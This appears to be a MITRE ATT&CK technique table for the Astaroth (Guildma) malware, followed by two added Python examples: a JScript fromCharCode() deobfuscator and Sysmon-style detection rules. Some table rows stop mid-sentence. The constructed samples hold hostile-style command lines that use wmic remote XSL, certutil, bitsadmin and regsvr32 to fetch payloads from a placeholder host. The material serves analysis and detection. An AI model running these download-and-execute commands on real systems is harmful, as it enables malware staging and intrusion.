Name | Description
---|---
Guildma |

Domain | ID | Name | Use
---|---|---|---
Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Enterprise | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification |
Enterprise | T1115 | Clipboard Data | Astaroth collects information from the clipboard by calling the OpenClipboard() and GetClipboardData() Windows API functions. [1]
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | Astaroth has used malicious VBS e-mail attachments for execution. [3]
Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Astaroth uses JavaScript to perform its core functionalities. [2][3]
Enterprise | T1555 | Credentials from Password Stores | Astaroth uses an external tool known as NetPass to recover passwords. [1]
Enterprise | T1132.001 | Data Encoding: Standard Encoding | Astaroth encodes data using Base64 before sending it to the C2 server. [2]
Enterprise | T1074.001 | Data Staged: Local Data Staging | Astaroth collects data in a plaintext file named r1.log before exfiltration. [2]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. [1][3]
Enterprise | T1568.002 | Dynamic Resolution: Domain Generation Algorithms |
Enterprise | T1041 | Exfiltration Over C2 Channel | Astaroth exfiltrates collected information from its r1.log file to the external C2 server. [1]
Enterprise | T1564.003 | Hide Artifacts: Hidden Window | Astaroth loads its module with the XSL script parameter
Enterprise | T1564.004 | Hide Artifacts: NTFS File Attributes | Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads. [3]
Enterprise | T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Astaroth can launch itself via DLL Search Order Hijacking. [3]
Enterprise | T1105 | Ingress Tool Transfer | Astaroth uses certutil and BITSAdmin to download additional malware. [1][2][3]
Enterprise | T1056.001 | Input Capture: Keylogging |
Enterprise | T1027 | Obfuscated Files or Information | Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys. [1][3]
Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | Astaroth uses a software packer called Pe123\RPolyCryptor. [1]
Enterprise | T1598.002 | Phishing for Information: Spearphishing Attachment | Astaroth has been delivered via malicious e-mail attachments. [3]
Enterprise | T1057 | Process Discovery |
Enterprise | T1055.012 | Process Injection: Process Hollowing | Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code. [1][3]
Enterprise | T1129 | Shared Modules | Astaroth uses the LoadLibraryExW() function to load additional modules. [1]
Enterprise | T1218.001 | Signed Binary Proxy Execution: Compiled HTML File | Astaroth uses ActiveX objects for file execution and manipulation. [2]
Enterprise | T1218.010 | Signed Binary Proxy Execution: Regsvr32 |
Enterprise | T1518.001 | Software Discovery: Security Software Discovery | Astaroth checks for the presence of Avast antivirus in the
Enterprise | T1082 | System Information Discovery | Astaroth collects the machine name and keyboard language from the system. [1][2]
Enterprise | T1016 | System Network Configuration Discovery | Astaroth collects the external IP address from the system. [2]
Enterprise | T1124 | System Time Discovery | Astaroth collects the timestamp from the infected machine. [2]
Enterprise | T1552 | Unsecured Credentials | Astaroth uses an external tool known as NetPass to recover passwords. [1]
Enterprise | T1204.002 | User Execution: Malicious File | Astaroth has used malicious files including VBS, LNK, and HTML for execution. [3]
Enterprise | T1497.001 | Virtualization/Sandbox Evasion: System Checks | Astaroth can check for Windows product IDs used by sandboxes and for usernames and disk serial numbers associated with analyst environments. [3]
Enterprise | T1102.001 | Web Service: Dead Drop Resolver | Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and on websites like YouTube and Facebook. [3]
Enterprise | T1047 | Windows Management Instrumentation |
Enterprise | T1220 | XSL Script Processing | Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. [1]
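The fromCharCode() trick noted under T1140 and T1027 hides commands as lists of character codes so that strings such as the WMI command line never appear in the script. The following is an added example, not code from the Astaroth samples or from the cited reports: it peels those layers off a constructed JScript snippet (double-quoted literals, `eval()` of a plain literal as the only layering construct handled, and `c2.example.invalid` as a placeholder URL) so that the staged command becomes readable.

```python
"""Peel String.fromCharCode() layers out of obfuscated JScript.

Added example, not code from the Astaroth samples or the cited reports.
Assumptions: string literals are double-quoted, and eval() of a plain string
literal is the only layering construct handled.
"""
import json
import re

# String.fromCharCode(119,109,105,99) -> the characters with those code points
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+)\s*\)")
# "abc" + "def" -> "abcdef" (both halves are kept in escaped form)
CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')
# eval("...") whose argument is already a plain literal -> the literal's contents
EVAL_LITERAL = re.compile(r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample in the style of a fromCharCode()-obfuscated dropper.
# c2.example.invalid is a placeholder, not an indicator from any report.
SAMPLE_SCRIPT = (
    'var o = new ActiveXObject(String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108));\n'
    'var c = String.fromCharCode(119,109,105,99,32,111,115,32,103,101,116,32,47,102,111,114,109,97,116,58)'
    ' + "http://c2.example.invalid/payload.xsl";\n'
    'eval(String.fromCharCode(111,46,82,117,110,40,99,44,48,41));\n'
)


def _codes_to_literal(m: re.Match) -> str:
    text = "".join(chr(int(n)) for n in m.group(1).split(","))
    return json.dumps(text)  # JSON escaping is valid JS for a double-quoted literal


def _merge_concats(script: str) -> str:
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
        if merged == script:
            return merged
        script = merged


def deobfuscate(script: str, max_rounds: int = 10) -> str:
    """Repeat decode / merge / unwrap until the script stops changing.

    Each round can expose a new layer (a decoded eval() argument may itself
    contain fromCharCode() calls), so the passes run to a fixpoint.
    """
    for _ in range(max_rounds):
        step = FROMCHARCODE.sub(_codes_to_literal, script)
        step = _merge_concats(step)
        step = EVAL_LITERAL.sub(lambda m: json.loads('"' + m.group(1) + '"'), step)
        if step == script:
            break
        script = step
    return script


def string_literals(script: str) -> list[str]:
    """Decoded double-quoted literals: the usual place to look for commands and URLs."""
    return [json.loads('"' + m.group(1) + '"') for m in STRING_LITERAL.finditer(script)]


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE_SCRIPT)
    print(cleaned)
    for s in string_literals(cleaned):
        print("literal:", s)
```

On the sample the first round already yields `new ActiveXObject("WScript.Shell")`, a merged `"wmic os get /format:http://c2.example.invalid/payload.xsl"` literal and a bare `o.Run(c,0);`; the second round changes nothing and the loop stops. Real samples use more escape forms (`\x..`, single quotes, array joins), so treat the regexes as a starting point rather than a general JScript parser.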
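Several rows of the table (T1105 certutil/BITSAdmin downloads, T1218.010 Regsvr32, T1220 remote XSL via WMIC, T1564.004 alternate data streams, T1204.002 VBS/JS files) describe living-off-the-land behaviour that shows up in process-creation telemetry. The following is an added example, not detection content from the cited reports or any vendor: it encodes those indicators as rules over Sysmon-style `Image` / `CommandLine` fields and runs them against constructed events, including benign uses of the same binaries that must not fire. Technique IDs follow the table; the events and `c2.example.invalid` are made up for the example.

```python
"""Flag the living-off-the-land patterns from the table on process-creation events.

Added example, not the cited reports' or any vendor's detection content.
Events are constructed; c2.example.invalid is a placeholder.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process (Sysmon Event ID 1 "Image")
    command_line: str   # its command line ("CommandLine")


def _img(e: ProcEvent, name: str) -> bool:
    return e.image.lower().endswith("\\" + name)


# (technique id from the table, description, predicate). These are heuristics,
# not a tuned ruleset: e.g. the ADS rule only looks for <file>.<ext>:<stream>.
RULES = [
    ("T1220", "wmic /format: pointing at a remote or .xsl stylesheet",
     lambda e: _img(e, "wmic.exe")
     and re.search(r'/format:\s*"?(https?://|\\\\|[^\s"]*\.xsl)', e.command_line, re.I)),
    ("T1218.010", "regsvr32 loading a scriptlet via /i: URL or scrobj.dll",
     lambda e: _img(e, "regsvr32.exe")
     and re.search(r'/i:\s*"?https?://|scrobj\.dll', e.command_line, re.I)),
    ("T1105", "certutil -urlcache ... -f download",
     lambda e: _img(e, "certutil.exe")
     and re.search(r"-urlcache\b.*\s-f\b", e.command_line, re.I)),
    ("T1105", "bitsadmin job used to fetch a file",
     lambda e: _img(e, "bitsadmin.exe")
     and re.search(r"/(transfer|addfile)\b", e.command_line, re.I)),
    ("T1564.004", "alternate data stream referenced on the command line",
     lambda e: re.search(r"\.\w+:[\w.$-]+", e.command_line)),
    ("T1204.002", "script host executing a VBS/JS file from a user-writable path",
     lambda e: (_img(e, "wscript.exe") or _img(e, "cscript.exe"))
     and re.search(r"\\(temp|downloads|appdata)\\.*\.(vbs|vbe|js|jse)\b", e.command_line, re.I)),
]


def evaluate(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (event index, technique id) for every rule each event trips."""
    hits = []
    for i, e in enumerate(events):
        for tid, _desc, pred in RULES:
            if pred(e):
                hits.append((i, tid))
    return hits


# Constructed events: six in the style the table describes, then two benign
# uses of the same binaries that a rule must leave alone.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic os get /format:"http://c2.example.invalid/payload.xsl"'),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://c2.example.invalid/stage2.bin C:\Users\Public\stage2.bin"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer dl /download /priority high http://c2.example.invalid/stage2.dll C:\Users\Public\stage2.dll"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s /n /u /i:http://c2.example.invalid/p.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c echo stage > C:\Users\Public\readme.txt:stage.dll"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\fatura.vbs"'),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"wmic os get caption /format:list"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"certutil -hashfile C:\Users\Public\tool.exe SHA256"),
]


if __name__ == "__main__":
    for i, tid in evaluate(SAMPLE_EVENTS):
        print(f"event {i}: {tid}  {SAMPLE_EVENTS[i].command_line}")
```

The rules deliberately key on the argument shape (a URL or `.xsl` after `/format:`, `-urlcache` together with `-f`, a stream name after a file extension) rather than on the binary name alone, since `wmic /format:list` and `certutil -hashfile` are routine administration; in production, parent-process and user context would be added as further conditions.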